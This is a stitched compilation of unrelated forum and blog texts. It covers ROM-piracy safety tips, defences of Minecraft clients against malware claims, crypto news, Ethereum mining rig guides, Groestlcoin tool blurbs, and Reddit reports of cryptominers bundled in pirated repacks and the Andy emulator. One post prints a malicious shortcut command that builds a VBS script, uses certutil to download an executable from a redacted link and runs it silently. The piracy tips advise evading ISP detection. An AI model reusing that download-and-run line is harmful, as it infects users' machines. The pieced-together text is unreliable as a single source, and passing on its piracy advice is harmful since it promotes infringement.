If u Want to Check if the site is safe go to here and comment ur site url
Tips :
Tip #1 : If you're in a country that hate piracy like USA or Germany ( i think Germany have dmca or something ?? idk ) etc. stay away from torrent and stay away from http sites
( download Https Everywhere extension and enable encrypt all sites eligible option by pressing on the icon of https everywhere ) even if your browser included with it . because it will warn you if the site is http...
Tip #2 : FBI will not raid your house ( because fbi will not waste there time on you )
Tip #3 : https is your best friend because it's encrypted that means if you go to a https roms site
your isp will see (random numbers and letters) .com/.net/.org/.to/.site etc.
Tip #4 : install an adblock i suggest Ublock Origin
Tip #5 : install a pop-up blocker if you have a chromium based browser like Brave, Chrome, New Edge etc. i suggest this ( if you know a better one please give me the link ) poperblocker
Tip #6 The MegaThread is your OTHER BEST FRIEND if you want an rom head to the megathread and press ctrl + F and search ;)
Tip #7 DON'T DO NOT OPEN ANY ANY ANY .MSI .EXE/.DMG/.DEB or ANY OTHER FILE THAT you CAN OPEN WITHOUT AN EMULATOR THE FILE IT'S 2000% A VIRUS ( EXCEPT WHEN you DOWNLOAD RETRO ARCH [ or any other emulator OF COURSE ] ) AND DON'T OPEN .BAT FILES IT CAN DELETE SYSTEM32 FILE AND IT'S ONE OF THE MOST IMPORTANT FILES IN WINDOWS
Tip #8 Emulating is Legal but Downloading ROMs is ILEGAL ( OF COURSE IF you're LIVING IN A COUNTRY THAT DMCA IS A HOLY THING ) ;-)
Tip #9 If you're suspicious of a file u can scan it on VirusTotal or Hybird Analysis ( you need to upload the file because it will open it on a vm in there sever ).
Tip #10 I recommend using a controller if you have a xbox controller just connect it to your pc and you're good to go BUT if you have a dualshock controller (ps controller )
use DS4 Windows ( if you have a windows pc ) ( I Know it's the fork bc the og creator stopped working on it in 2016 or somthing like that )
or any other controller .
Tip #11 If you download a rom and it came in .rar .zip .7z .r001( if the rom came with multiple files like .r001 .r002 .r003... you need to extract just a one file) etc. you can use 7-ZIP or Winrar ( don't worry 40 days trial doesn't end ).

Tip #12 if the rom came in this order rom.rar.exe don't think to open it and if you hide the extension file from showing from the file name it will show like rom.rar but it's actually a .exe or .dmg etc.

Tip #13 if you have a linux pc or a mac that doesn't mean you will not get infected even Temple OS have malwares ( if you don't what's a malware is just search ).
Tip #14 if u tired of link shorters and etc. use universal Bypass

Heres some proof about sigma not being a trojan and omikron client proof from the sigma creator andro

The high GPU usage is due to the GPU acceleration or the UIs. And this is not comparable to other person's GPU usage since every GPU behave differently. You can compare this usage with vanilla 1.15.2's GPU usage. In my personal case, it's about +1~8% higher.
And the overall performance loss over the 1.8 clients is due to the 1.15 itself, the heavy UI, the missing optimisations (performance update soon), the obfuscation, etc
Some people are saying that "conhost.exe" is a malware... It's actually the console process spawned by java.exe which is used by Sigma (instead of the javaw.exe, the window version of java.exe without the console, that is mostly used for Minecraft).
Fun fact: Badlion client and Lunar client are also spawning conhost, and they aren't getting called out as malwares.
Here's a great explanation of what it is: https://www.howtogeek.com/howto/4996/what-is-conhost.exe-and-why-is-it-running/

And Omikron client was not a bitcoin miner, here's the copypasta :
Omikron client didn't have any btc miner / rat / botnet or whatever. The thing running in background was a system to validate the usage of the auto alt / proxy from other computers. Therefore, if you used auto alt / auto proxy, your computer among others validated in some sort of P2P the usage of alts / proxies. If >50% of computers says that a "transaction" is good, it was validated. Omikron decided to do that to counter the abuse of auto alt / auto proxy.
But ofc you could disable that autorun in Omikron Client's setting. And it was clearly written in the client that it would autorun (but no body really read it) if you use auto alts / auto proxy.
Edit, another copypasta:
I know, this is missleading. In the code, finding alts is refenrenced as "mining" them because you have this usepass combo and sometime yay ! Its a working minecraft alt ! The whole problem about all this drama is that its old code written when the client was "ghost client" and putting it in a .m file intead of .minecraft, having the package not named omikron, not using omikron domain name in the code was a good idear to prevent memory scanning cheating software such as BLSquad to find "omikron" but as you can tell it has bring more trouble that anything. You shoudn't be scared, your cpu isn't and wont be used to mine crypto or any unwanted activity and you will soon be able to chose if you want the service to run. In the next release, beside the fact that all of this was moved to .minecraft/Omikron, using proper domain name etc, you will be able to choose if you are using the client and want the background service running to find alts or if you have the client installed but not using it you will be able to disable the background service.
The video that is spreading about Omikron client is only proving that it downloads an autorun, and runs it in the background, which is intended.

Be careful of people trying to spread that Sigma could be a virus. Most of the time, they're made up by people who are clueless and don't know about what they're talking about (ex: conhost).

New Draft Law Suggests The European Union Is Set To Regulate Cryptocurrencies
The European Commission proposed to establish a legal framework for cryptocurrencies, security tokens, and stablecoins by analogy with the requirements for traditional financial instruments. This is stated in the Cryptocurrency Asset Markets Bill. The bill proposes to treat cryptocurrency assets like any other financial instrument. According to the European Commission, this will provide legal clarity.
Digital Assets Recognized As Securities In Nigeria
The regulator clarified that cryptocurrencies offer public alternative investment opportunities. Digital assets can be used as a medium of exchange, settlement, and accumulation. In order to protect investors from risks and not violate the integrity of the market, crypto assets must be controlled on an equal basis with securities. The main task of regulation is not to discourage the development of new technologies, but to ensure fair market competition and adherence to ethical standards.
Hacking
Japanese Crypto Exchange Sues Binance for Role in $63 Million Bitcoin Hack
The Japanese company Fisco Cryptocurrency Exchange, Inc has filed a US lawsuit against Binance Holdings Ltd., accusing it of providing a service to launder cryptocurrency stolen from the Zaif exchange in 2018. Fisco acquired Zaif in 2018 shortly after the hack. Over $9 million in stolen assets could have been funneled through Binance. The company notes that analysts were able to track the movement of all stolen $63 million to one bitcoin address. Subsequently, 1,451.7 BTC were sent from it to Binance addresses.
New Virus Attacks Microsoft SQL Database Servers For Monero Mining
Tencent's cybersecurity division has discovered a new miner virus called MrbMiner. The tactics of the virus are quite simple — the botnet scans the available IP addresses in search of Microsoft SQL servers, and if it detects such, it tries to log in under the administrator account using a brute-force password. If successful, the virus downloads the assm.exe file, which implements a reboot mechanism and creates a special account for hackers to access the server. After that, MrbMiner downloads a miner for mining the anonymous cryptocurrency Monero (XMR).

Building an Ethereum Mining Rig (13 GPU) - 4th part

Third update to the guide "Building a Mining Rig for Ethereum". The absolute first guide to building a RX Vega 64 8gb 13 GPU Mining Rig.
Reading this guide to building a 13 GPU Ethereum mining rig requires adequate knowledge of building and running an Ethereum Mining Rig. We therefore recommend a previous view of our Guide to build a Mining Rig and related updates.

Let's immediately list the hardware used:

- Asus Mining Master X370 mainboard
- Core i5 Coffee Lake CPU
- 480 or 500GB SSD
- 32Gb Ram
- 13 GPU RX Vega 64 8Gb
- 3 x 1000W power supplies
- 1 1200W power supply
- 8Gb USB stick

In this guide we will obviously not explain how to mount the hardware of a Rig. The only notes we wish to underline are the following:

- the 1200W power supply must be the primary one on which to connect 4 GPUs and the video output for the monitor

- all the risers, as well as obviously the GPUs, must be powered through the 8-pole connections of the power supplies. We strongly advise against the use of 6-pole ports. Therefore, have the appropriate number of cables available for all connections. Risers can also be powered in pairs.

- the model of the video card used is the Asus Rog Strixx Gaming RX Vega 64 8Gb

The operating system is Windows 10 updated to the latest version available. The tool for creating installation media is available at the following link https://www.microsoft.com/it-it/software-download/windows10 to be able to use the USB key as a launcher for installing Windows 10 .

With the Asus Mining Master, the GPU risers can be connected directly to the motherboard via the USB cable, thus making one of the small components of the riser kits unusable.

After making all the connections on the motherboard, check that all GPUs are highlighted in green when the PC starts up. If not, move the USB cable on the motherboard one position. It may take at least 2 or 3 attempts.

Ethereum mining with 13 GPUs
Having solved this possible small inconvenience, let's proceed with the installation of the AMD Adrenaline 2020 drivers, always updated to the latest version, relating to the RX Vega Series.

If you want to proceed with more caution, the advice is to disconnect all the GPUs (remembering the locations of the USB cables) except one before installing the drivers.

The mining will be carried out on the Ethermine pool, our favorite, using the Claymore 15 software.

Once the download is complete, you will have to unzip the folder on the desktop and open the start.bat file contained in the Claymore folder using Notepad. The procedure is the usual one: delete the content and copy-paste the following command string:

start config.dll -epool eu1.ethermine.org:14444 -ewal "your ETH wallet address" -epsw x -worker "worker"
EthDcrMiner64.exe

Where EthDcrMiner64.exe is the executable, -epool indicates the pool to mine and its port, -ewal is the wallet address and -epsw is the password that we leave blank (X).

In place of "your wallet address" you will have to put your Ethererum wallet and instead of worker you will enter an identification number in case you plan to build more RIGs (such as RIG1, RIG2, etc ...).

At the following link, many other useful commands for your Rig:
https://github.com/Claymore-Dual/Claymore-Dual-Miner

Try to run mining and check that the system is stable.

In the Payouts section, after a few minutes of mining, you can decide the minimum amount of Ether to be sent to your wallet by simply entering the IP address of the RIG.

We performed the mining directly on the Ethereum address of the Exodus wallet. Coinbase is not supported.

Overclocking with OverdriveNTool
Let's proceed now with the download of OverdrivenTool at the following link: https://forums.guru3d.com/threads/overdriventool-tool-for-amd-gpus.416116/

For those unfamiliar with it, we recommend reading our software guide.

For those who do not intend to experiment or do not completely trust their software experience, at the following link you can view the settings on the parameters of the GPUs and the RAM of the GPUs - and other small tricks - to obtain the best possible performance without forcing the cards too much. video.

On our Youtube channel (subscribe numerous !!!) you will now be able to see the video relating to the start of mining and the one concerning the stabilization phase.

To better cool the Rig we have also installed fans for the extraction of heat as caution is never too much. Moreover, there is also an aesthetic gain.

Conclusions on the guide to build a 13 gpu ethereum mining rig.
Finally, we conclude this guide by reporting what everyone was waiting for (we do not say how long we had to wait before obtaining this result) the video link complhttps: //www.youtube.com/watch? V = k53XZn3zc9I & t = 61seto del Rig e del Mining .

We remain available for any advice, both on pools, on yield and on consumption.

Feel free to contact us in case you run into any problems where our guide to Building a 13 GPU Ethereum Mining Rig has not been completely helpful.

See you soon.

Building an Ethereum Mining Rig - Part 2

First update to the guide "Building a 6Gpu Mining Rig for Ethereum" - Let's talk about Claymore.
This update supplements and does not replace the Guide to Build a 6GPU Mining Rig for Ethereum published on our site.

The substantial differences are due to the installation of the latest version of the Windows 10 Operating System, the mining on the Ethermine pool (in our opinion simpler than Dwarfpool) and the use of the XFX RX 580 8gb GPUs.

The first variant is found in Part 4 of the guide: the environment variables are not to be entered as they will be integrated directly into the bat file to start mining.

The second variant is found in Part 7 of the guide and leads us to "mine" on a different pool using the Claymore software.
Download the latest version at the following link: https://github.com/Claymore-Dual/Claymore-Dual-Miner

Once downloaded, unzip everything on a folder on your desktop and open the start.bat file with notepad. Clear the contents and copy the following command:

start config.dll -epool eu1.ethermine.org:14444 -ewal "your ETH wallet address" -epsw x -worker "worker"
EthDcrMiner64.exe

Where instead of "your wallet address" you will have to put your Ethererum wallet - obviously without the quotes - and instead of worker you will put an identification number in case you build more RIGs (such as RIG1, RIG2, etc ...). We opted for the eu1 pool even if some on the discussion forums believe that the us1 is more profitable.

At the following link, many other useful commands for your Rig:
https://github.com/Claymore-Dual/Claymore-Dual-Miner

The Ethermine pool offers a very well crafted and descriptive interface. In the Payouts section, after only 5 minutes of mining, you can decide the minimum amount of Ether to be transferred to your wallet by simply entering the IP address of the RIG.

We have decided to mine directly on the Ethereum address of our Exodus wallet. It is not recommended to mine directly on Coinbase, as reported on the site itself. Sin.

Nothing should be left to chance when you decide to build a mining rig for Ethereum.
The third variant is the most difficult of all. Once you have reached Part 5 of the guide, you can decide whether to continue or follow this update / variant. If you are here it is probably because you have run into some problem that the guide does not allow you to solve.

With the latest version of Windows 10, you may run into a kernel conflict between the operating system and AMD's Radeon Software Crimson ReLive Edition Beta for Blockchain Compute drivers. This conflict will prevent you from using Atiflash after installing the drivers.

Important: Before making any changes to the BIOS, please backup each GPU.

Important: first of all flash the GPUs with the original bios if for any reason you are forced to reinstall the operating system.

Still on Atiflash.
The advice would therefore be to flash the GPUs and then install the AMD drivers. Let's say it would be because you may run into another problem this time related to the GPUs themselves. Since each video card is different from any other, the bios mod of the GPU could crash the operating system showing the classic blue screen and displaying an error related to the Atimkdag.sys file.

This could be due to the fact that some GPUs have significantly higher performance in the calculation phase than others. We could call it a factory overclock but not using them for gaming we cannot say it with absolute certainty.

Having assessed these two drawbacks, the only safe solution is to flash all the GPUs, disconnect them except for the first one, install the Blockchain drivers (plus Atimkdag patch) and launch the mining command verifying that the operating system does not go into crash in the next 5 minutes.

Turn off the rig again and connect the second GPU so on up to the sixth. In the event that one or more video cards should crash the system, disconnect them. After that, it uses DDU from the provisional mode and flashes these GPUs with their original bios. At this point, connect them again, reinstall the Blockcain drivers (plus Atimkdag patch) and start mining definitively.

All the operations related to the use of Atiflash, DDU and driver installation are reported in Part 5 and Part 6 of our guide.
A little bit of Overclocking.
You will certainly find significant differences in performance between the GPUs.

At this point all that remains is to "operate" with an overclocking software. We opt for OverdriveNtool. Our constantly updated guide is available at the following link: https://www.cryptoall.it/2019/10/12/complete-guide-to-overdriventool/

Link to the official YouTube channel for verification: https://www.youtube.com/channel/UCdE9TTHAOtyKxy59rALSprA

GPUs with modified bios will not leave much room for modification. You will have to proceed with the most extreme overclocking on those that mount the original bios; obviously always in small steps by saving the profile for each GPU. Our guide explains in detail how to do it.

Hoping to have been of help, we give everyone an appointment for the second part of the update on how to build an Ethereum mining rig in which we will explain in detail the dual mining on the Ethermine pool.

See you soon.

Got owned by a malicious torrent, and want to understand how it works

hi folks,
recently I got really sloppy and ended up downloading a malware... it was supposed to be a Bojack Horseman Hentai (just kidding haha) , but happened to be a malware... the file itself was a shortcut with the following commands... after all, I ran in a VM, and it seems to be a bitcoin miner or something like that... but I want to understand each part of this shortcut, because it makes a lot and is actually small and apparently doesn't need any other file to trigger, but I have no knowledge on VB or windows scripting.. if you can help please...

shortcut:
%ComSpec% /c
echo CreateObject("Wscript.Shell").Run"""%ComSpec%"" /c del ""%USERNAME%.vbs""&certutil -urlcache
-f https://SOME_MALICIUS_LINK_HERE=berivel_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe""
&&""%USERNAME%.exe""",0 >"%USERNAME%.vbs"&"%USERNAME%.vbs"
----------------------------------------------------------------------------------
I change the link there, but it actually had this line breaks in the text...Here is what I manage to understand the step by step: (please correct me if I'm wrong)
- %ComSpec% /c shortcut to CMD and /c to run what comes next
- echo ???? I don't get why echoing here...
- CreateObject("Wscript.Shell") probably creating a script, is it VB script?
- .Run probably running it..
-"""%ComSpec%"" /c run again the cmd, I don't get why, also don't get this many quotations marks
- del ""%USERNAME%.vbs"" deleting a vbs file named with the username, which didn't even exist before? where did it create it in the first place? once again, why double double quotes?
- &certutil -urlcache - this mess something with the certificates on the OS, right? what exactly does?
- -f https://SOME_MALICIUS_LINK_HERE=berivel_%PROCESSOR_ARCHITECTURE% ""%USERNAME%.exe"" this -f is a parameter for the previous command, what is it? and next is where I think the magic happens, I change the link because I don't know if it's safe.. and it passes the processor and a exe which was probably recently created as args... when did it create this process?
- &&""%USERNAME%.exe""",0 now I think it runs this recently created exe, again with the ""quotes"", and what about this ,0 ??
- >"%USERNAME%.vbs"&"%USERNAME%.vbs" I think this > is saving it to a file, but I got no clue about this trick of using & and itself again... what is happening there?
that is it! is that everything it needed to work, or did I probably miss some file? can someone help me to understand it better? a step by step would be very clarifying

ProxyGate

ProxyGate
Hello reddit, I was playing games yesterday, when I realised my cpu and memory usage was extremely high. I was looking through task manager, and saw a substantial amount was due PG COMPONENT 32. I did some research and apparently, it ties into something called cloud.exe. Most sites are telling me that its a virus, and I want to remove it. I have attached the folder of said Cloud.exe (part of PROXYGATE), and was about to delete it. However, I am not sure what to do. Alarmingly, malwarebytes reported some sort of bitcoin miner, along with the cloud. Please help me finding a solution and also tell me about a good (and free) AV, I can use to protect myself in the future
Edit: I would like to post an update here. I downloaded MalwareBytes, and tried to delete the files this time. Not only that, it detected 100s of malware, bitcoin miners etc on my system. I removed them all, and my computer has never been faster; my cpu usage, ram have gone down by more that 80%. Thank you guys for the help and advice.

Fitgirl Assassins Creed Origins install bitcoin miner causing high cpu usage when Task Manager is not running

Fitgirl Assassins Creed Origins install bitcoin miner causing high cpu usage when Task Manager is not running
Hello,I downloaded Assasins creed origins today from this site: fitgirl-repacks dot site And something feels odd when I exit the game, my CPU is running at roughly 60%, and as soon as I open task manager it would go back to normal. I ran malwarebytes and it found 2 suspicious items and removed them, but the problem continue, so I started to investigate manually. So I start up Performance Monitor and check which process would shoot up as soon as I close Task Manager. This is what I found. SoundModule. I open up Task Manager, and found 2 running process of this, I open their location and found them at AppData\Roaming\Microsoft\SoundModule.
I quickly look these up, they do not belong to microsoft and won't trigger any antivirus or malwarebytes, I killed those process and deleted them which solved the problem for me. Hopefully this post will help someone in the future.
For more details regarding this "SoundModule" https://www.anti-malware.name/removal-guide/remove-soundmodule-exe/
I started the game again after that and the "soundmodule" executable or process did not get recreated.
If you pirate a game, make sure you check on your CPU usage to see if there is an suspicious thing going on. In my case, I only realized that something is running on my cpu due to CoreTemp, because I would see the temperature be at 60 to 70 degree Celsius, while my normal idle temp is usually only at 40 to 60, and as soon as I start Task manager, the temperature did drop back to 40ish.
https://preview.redd.it/p0tdcjf4vpm41.png?width=1576&format=png&auto=webp&s=f20dfabcc39a685e86e66ee4a9fc33604396de4d
I have ran the script to verify bins a few times before installing cause it didnt seem to do anything to me. Installed the game and had the cpu issue.
P.S. If you don't trust me, that is fine. This post is not for you. I am not here to convince you or trash fitgirl. We are all pirates here, we are all stealing in someway. This post is mainly for someone else that may have this problem in the future.
If anyone have similar issue, and don't know how to find the bitcoin miner in their pc, do not be shy to private message me, I am happy to help. It is very easy for developers to scan for running process and stop work while a given process is opened, thus the miners process will continue to evolve to hide under more and more programs, so it will become very difficult at some point.
UPDATE:
I was contacted by 2 people that have seen this post. 1 person has installed the same package and was not affect. Another person has installed the same package and was affected. Chance is the installer is installing the bitcoin miner based on random number generator.

JC3 XL SEYTER has bitcoin miner!

Installation took about 8 hours on my pc. I was sleeping, anyways it looks like try to install these files when directx and other visual thing came up. Be carefull you dont want your pc to be victim.
Im suggesting to *scan your computer if you installed any SEYTER repack*, scan with Avira Free or Malwarebytes Free. Both working nice.

HOW TO REMOVE IT
  1. Download and install Malwarebytes, Avira or AVG from their site.
  2. Scan your C:(Windows) drive and wait for it to find Miner files.
  3. If there is check folder name and go manually there or delete from antivirus-antimalware.
  4. You should really delete that folder.

F.A.Q.
Q: DELETING GAME CLEANS MY PC?
A: NO.
Q: IS ALL ISSCH FILES BITCOIN MINEMALWARE?
A:NO, CHECK CREATION DATES.
Q: I DIDNT DOWNLOAD FROM RUSTORKA, DO I HAVE BTCMINEMALWARE?
A: YOU PROBABLY HAVE IT.
**MakeItYours9** Check your "Task Scheduler" I've found an ISSCH reference there and deleted it.
QUOTE FROM FITGIRL
I can confirm that at least early RotTR Seyter's repack contained malware. I've put an investigation on rutor. And magnet links for rustorka (magnet:?xt=urn:btih:e41e3e6b8ce4701792f1b3a4ca4f5c43034626ae) and rutor (magnet:?xt=urn:btih:112b33845accf5d39ed92d2bee58bb2d2b307d66) are still active, so anyone can make sure, that game-7.bin contains the virus installer, while EXEs are different for two magnets. Why exactly Seyter made it and not some other uploader? It's simple. Seyter uses modified FreeArc, made by this tool: http://krinkels.org/threads/fa_protect.1873/ When you generate a new FreeArc copy with FA_Protect, you enter the password, it's unique. And the archives, created with your version of FreeArc won't be compatible with original FreeArc. And game-7.bin can ONLY be extracted by using unarc.dll in Seyter's repack. As all other his archives. So only Seyter could create that bin. One more thing. Both setup.exe's have the same size. But if you make byte-comparision, you'll see that they are different. First I've made xdelta between them, and xdelta file was ~16 KB. Then I ran both installers and made memory dumps with Process Explorer. Then looked for installer section (Inno Setup leaved many traces in memory). I've checked the number of unpacked archiees, and found out, that game-7.bin is only unpacked in rutor (not rustorka) version. Then I've found the password for that archive (555, while other bins use 9im6rXzBCM0zAAfnfesw). You can download the unpacker here: http://www35.zippyshare.com/v/D3x1w1cy/file.html When you extract setup.exe from game-7.bin - DO NOT RUN IT, until you know what you're doing. If you have friends who can deal with such stuff - hand the file to them. When I knew that setup.exe resides in game-7.bin, I searched for it in rutor setup memory dump. And have found that it extracts to user local app data folder and then silently runs. ISSCH.exe install in pretty random folder, so it can be anywhere. So yes. It's 100% positive, that it was the Seyter, who did the infected repack. His idea was to blame others for infecting his reuploads, cause Rustorka installer CONTAINS the bin-file, but never runs it. He's a moderator on Rustorka and a friend of Rustorka's admin, Markus. And that's why he don't shit at home, but feels comfortabe to infect his uploads for other sites. After my investigation (and CPY crack release) he updated his repack on Rustorka, and removed notorius game-7.bin. But Internet remembers everything, and the magnets are alive. Avoid any Seyter repacks in the future. If you don't like my repacks, stick to one of those: RG Mechanics RG Revenants Xatab RG Catalyst As myself, they never put malware in repacks and you'll be safe. Now, when I registered on Reddit, you can ask questions about my repacks if you have some.

HODL GRS utilizes AES hardware encryption, app sandboxing, and the latest security features to protect users from malware, browser security holes, and even physical theft. Private keys are stored only in the secure enclave of the user's phone, inaccessible to anyone other than the user.
Simplicity and ease-of-use is the core design principle of HODL GRS. A simple recovery phrase (which we call a Backup Recovery Key) is all that is needed to restore the user's wallet if they ever lose or replace their device. HODL GRS is deterministic, which means the user's balance and transaction history can be recovered just from the backup recovery key.

ALL NEW! – Vanity Search Vanity Address Generator

NOTE: NVidia GPU or any CPU only. AMD graphics cards will not work with this address generator.
VanitySearch is a command-line Segwit-capable vanity Groestlcoin address generator. Add unique flair when you tell people to send Groestlcoin. Alternatively, VanitySearch can be used to generate random addresses offline.
If you're tired of the random, cryptic addresses generated by regular groestlcoin clients, then VanitySearch is the right choice for you to create a more personalized address.
VanitySearch is a groestlcoin address prefix finder. If you want to generate safe private keys, use the -s option to enter your passphrase which will be used for generating a base key as for BIP38 standard (VanitySearch.exe -s "My PassPhrase" FXPref). You can also use VanitySearch.exe -ps "My PassPhrase" which will add a crypto secure seed to your passphrase.
VanitySearch may not compute a good grid size for your GPU, so try different values using -g option in order to get the best performances. If you want to use GPUs and CPUs together, you may have best performances by keeping one CPU core for handling GPU(s)/CPU exchanges (use -t option to set the number of CPU threads).

ALL NEW! – Electrum Personal Server

Groestlcoin Electrum Personal Server aims to make using Electrum Groestlcoin wallet more secure and more private. It makes it easy to connect your Electrum-GRS wallet to your own full node.
It is an implementation of the Electrum-grs server protocol which fulfils the specific need of using the Electrum-grs wallet backed by a full node, but without the heavyweight server backend, for a single user. It allows the user to benefit from all Groestlcoin Core's resource-saving features like pruning, blocks only and disabled txindex. All Electrum-GRS's feature-richness like hardware wallet integration, multi-signature wallets, offline signing, seed recovery phrases, coin control and so on can still be used, but connected only to the user's own full node.
Full node wallets are important in Groestlcoin because they are a big part of what makes the system be trust-less. No longer do people have to trust a financial institution like a bank or PayPal, they can run software on their own computers. If Groestlcoin is digital gold, then a full node wallet is your own personal goldsmith who checks for you that received payments are genuine.
Full node wallets are also important for privacy. Using Electrum-GRS under default configuration requires it to send (hashes of) all your Groestlcoin addresses to some server. That server can then easily spy on your transactions. Full node wallets like Groestlcoin Electrum Personal Server would download the entire blockchain and scan it for the user's own addresses, and therefore don't reveal to anyone else which Groestlcoin addresses they are interested in.
Groestlcoin Electrum Personal Server can also broadcast transactions through Tor which improves privacy by resisting traffic analysis for broadcasted transactions which can link the IP address of the user to the transaction. If enabled this would happen transparently whenever the user simply clicks "Send" on a transaction in Electrum-grs wallet.
Note: Currently Groestlcoin Electrum Personal Server can only accept one connection at a time.

GPU Mining Crash Course - START HERE!

Welcome All to the GPUMining Crash Course!
With the increase in prices in cryptocurrency, a lot of people are getting back into mining and a lot of people are brand new to the concept overall. So, I quickly wrote this crash course to help you understand what to expect and how to successfully mine your first cryptocurrency. This crash course isn't gonna have all of the fluff you'd see in a normal publication. This is just everything you need to know to get up and running on your first cryptocurrency mining rig.

What is cryptocurrency mining?

One of the main things about cryptocurrencies is that they are "decentralized". Sounds great, but WTF does that even mean? Well, the easiest way to explain it is...
You know how if you want to send your friend/family money digitally, you can do so through your bank. Your bank likely takes a transaction fee and in a few days they will transfer the money. Since cryptocurrencies are decentralized, they don't have a bank or organization to fulfill the transfer of money. Instead, they outsource the computing power of their cryptocurrency network to miners (soon to be you). These miners are verifying transactions, securing the blockchain, and powering the cryptocurrency's specific network among other things. As an incentive, the miners collect transaction fees on the transactions that they verify and collect block rewards while new currency is still being introduced into the ecosystem.

What kind of rig should I build?

You can mine cryptocurrencies using your CPU, GPU, FPGA, or ASIC, but this is a GPU Mining subreddit, so I will cater this to GPUs.
For building a great all-around GPU rig, there are two models of GPUs that I'd recommend:
Both of these GPUs have solid hashrates across most mining algorithms and for a decent price! You should be able to find both of these kinds of GPUs used for around $200-$250 each, which is a great price if you know what happened during the last mining craze! ($200 GPUs were out of stock everywhere and people were reselling them for $600+ each)
There are also plenty of great AMD GPUs for mining, but I've worked mostly with Nvidia so that's why both of my recommendations are Nvidia and not AMD.
Other parts to your rig that you'll need are listed below. Most of these can be pieces of crap and are just needed to make the rig actually run, but the one spot you DON'T want to cheap out on is the power supply unit. A decent power supply unit will keep your home from burning down while also keeping your rigs up and running smoothly. Here are my recommendations:

She's built, now what?

Now you need to do a few things. I am a Windows miner, so I will be speaking to Windows here:
  1. Update Windows - Do all of the updates. Just do it.
  2. Update Drivers - Go to the EVGA website and download GeForce experience. It will keep your GPU drivers up to date.
  3. Go to Windows Device Manager and make sure all of your GPUs show up under "Display Adapters". If it is there, but it isn't showing the Name/Model of the GPU as the name, right click it and select "Update Driver". This should fix it.
Assuming you've done all of this, you're ready to download a mining application.

Mining Software

There are tons to choose from! Claymore, Phoenix, EWBF, LolMiner, etc... It can be overwhelming pretty quickly since they all have different algorithm support, speeds, efficiencies, and a whole lot more. On top of that, in order to get them running you need to set up batch files to call the proper exe, point you to the correct pool, and a whole bunch of other stuff that can be confusing to a new user. Not to mention, you will probably need a separate miner, config file, batch file, etc. for each different algorithm that you're interested in mining on.
Instead, I recommend that you download a miner management software that will take care of most of this tedious work for you. There are a few in the sidebar, but the /GPUMining favorite is AIOMiner. It was developed by our very own community member, xixspiderxix with the intention of making mining as easy as possible to do and without any fees. It supports over 100 different algorithms, so you'll be able to mine nearly ANY cryptocurrency you'd like. Just download it from their website and it will take you through a quick tutorial to help you get set up! You can also connect your rig to their website for remote monitoring and control. You've probably seen a few of their posts around this subreddit.
Other Windows mining softwares include:
Note: Many mining softwares have fees built into them. Most are around 1%, but can go as high as 5% or greater! You want a mining software with little or no fees at all so that you get to keep as much cryptocurrency as possible. These fees aren't something you actively pay, the software will automatically take it by mining on the developers behalf for a given amount of time and then switching back to mining on your own behalf. So, please be diligent in the software that you evaluate and make sure it is reputable.

I keep hearing about NiceHash. What is that?

The asshole of the mining industry. Jk, but not really.
NiceHash is a software program that allows you to sell your rig's hashing power to someone on their marketplace. They market themselves as profitable mining, but you're not really mining. You're selling your power in exchange for Bitcoin.
They did a great job telling people that with them, you're always mining the most profitable coin, but that's just not true. Since it is a mining marketplace, they make you mine whatever their most expensive contract is. If their contracts are below market prices, then you're not operating as efficiently and profitably as you could be.
NiceHash also has a sketchy history, which continues to this day. In 2017, they were hacked and lost $65M worth of Bitcoin. No one got paid out for MONTHS and many of their executives conveniently resigned. Their platform is also used to destroy cryptocurrencies. Since people are able to purchase mining power on their platform, people have used their platform to purchase enough mining power to control individual cryptocurrencies and duplicate coins, which increased the malicious user's wealth while completely destroying the integrity of the coin's blockchain. HoriZEN (formerly ZenCash), Ethereum Classic, and many other great cryptocurrencies have been the victim of NiceHash's platform.
For this and many other reasons, we highly recommend that you stay AWAY from Nicehash. We understand that it is extremely easy to use and you get paid in bitcoin, but they are destroying the industry with their greed and lack of motivation to change their platform for the protection of cryptocurrencies.

Concluding Thoughts

This is pretty much everything you need to know to get started. We covered the hardware, setting up the software, which software to use, and AIOMiner's tutorial will get you up to speed on how to actually mine the cryptocurrency that you want better than I can explain it, so I'll leave that part to them.
If you have any questions on this crash course, please leave a comment below where myself and other community members will be able to help you out.

WARNING: Andy Android emulator (AndyOS, Andyroid) drops a bitcoin miner on your system

lawrenceabrams has done a lot more digging and research and has published an article which you can read here.
Update: Their Facebook support group has been changed to a closed group meaning you can't view their posts if you're not already a member. Luckily I have a fair few sleeper accounts in that group and I'll report back with anything worth noting.
Clarification: In the video I fail to close Andy when checking my GPU stats but I can confirm that they are roughly the same as when Andy is open. The mining process runs even with Andy closed and it opens on startup. I use the term bitcoin in this thread and the video as it's almost become a generic trademark. People instantly know what bitcoin is. I used cryptocurrency when talking to people in the Andy support group and they got confused and thought I was talking out my arse.
MAJOR UPDATE: I asked the Andy staff why they're still serving the infected file. After seeing that comment, and probably after seeing this reddit thread they've removed me from the group.
A friend opened Andy in process explorer to see the files it drops upon installation. By the looks of things, the installer isn't at fault. Andy itself calls an IP which then transfers the bitcoin miner to your system.
Andy clearly have no interest in fixing this issue and they're doing their best to censor it. At this point I wouldn't be surprised if this is completely down to their doing. The fact that they've completely blocked me from contacting them and the removal of all of my posts to them suggests that they don't care and don't want anyone to know.
Please keep in mind that this may not directly be Andy's fault. I'm not trying to directly accuse Andy of being at fault here but until an official statement is made from the Andy team I'm going to tell it how it is, and how the majority of people will see this situation. The installer Andy uses drops a cryptocurrency miner on your system and it has been reported in the past but no effort has been taken to cut ties with the company that created the installer. This is still Andy's responsibility. Funnily enough, the owners of Andy and the admins in the Andy support Facebook group actually recommend turning off your antivirus whilst installing.
All evidence provided on this post is true with version 'Andy_Nougat_260_1096_26' (latest release available from the official Andy website).

Backstory

I was searching for an Android Emulator and came across an Android Authority list of the 15 best Android emulators for PC (now 14 after I contacted the writer of the article with evidence). I saw Andy was on this list and it was described as a big competitor to the likes of Bluestacks. I'd used Bluestacks previously but I was looking for a different emulator just to try something new. I downloaded Andy, installed it (I declined the offer relating to Yahoo), and began using it. I finished up what I was doing, closed Andy and opened some games. I noticed that in every single game I played I suffered major FPS drops at seemingly random times. I checked my GPU usage and temps and noticed they were working at roughly 80% load and 80+ degrees C whilst gaming. Very unusual for my setup. I opened task manager and sorted it via what was using the most GPU power and found a process named 'updater.exe'. After further inspection I noticed that this installed along with Andy.

Evidence

